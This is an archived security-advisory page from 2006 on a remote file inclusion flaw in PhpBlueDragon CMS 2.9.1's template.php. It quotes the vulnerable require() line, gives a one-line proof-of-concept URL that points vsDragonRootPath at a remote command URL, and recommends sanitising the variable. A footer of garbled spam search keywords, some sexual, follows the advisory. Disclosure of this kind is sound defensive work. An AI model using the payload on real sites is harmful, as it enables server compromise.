about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , PhpBlueDragon CMS <= 2.9.1 (template.php) File Include Vulnerability




2006-06-14 PhpBlueDragon CMS <= 2.9.1 (template.php) File Include Vulnerability 
Rated as : High Risk

-----------------------------------------------------
Advisory id: FSA:015

Author:    Federico Fazzi
Date:      14/06/2006, 18:20
Sinthesis: PhpBlueDragon CMS 2.9.1, File inclusion vulnerability
Type:      high
Product:   http://phpbluedragon.net/
Patch:     unavailable
-----------------------------------------------------


1) Description:

Error occured in template.php, line 23:

---
require($vsDragonRootPath."public_includes/pub_kernel/pbd_template_custom.php");
---

2) Proof of concept:

http://example/[pbd_path]/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=[cmd_url]/
(note this is with final slash (/))

3) Solution:

sanitized $vsDragonRootPath
securitydot.net - 2006-06-14

Advertising

Copyright 2007, SecurityDot
Sun, 22 Nov 2009 02:16:58 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Www.Indian 2.6.10-1.7 realtek se INDINSEX news for c free sexi php-nuke 2 bigblackas Crack Data byonce Www.blacks shakeelabo directadmi www.so8888 www.ai0916 bhumika se thrisha bo _ Simple TAJMAHEL Burning Bo szyikai.co www.7gouwu www.angles WP_Title F Shakeela bedroo WWW.Vid www.sex89. www.zaicon WWSEXXX hemire kelly nort FULSEX anetta+key = !scan ne last updat apache 1. = !scan ne U.S. Robot MUSICA ECU beastforum geirls se web.mymyda all cartoo ssh-1.99-o www.lamasl www.soudu. puase perl+phpbb saxfarmar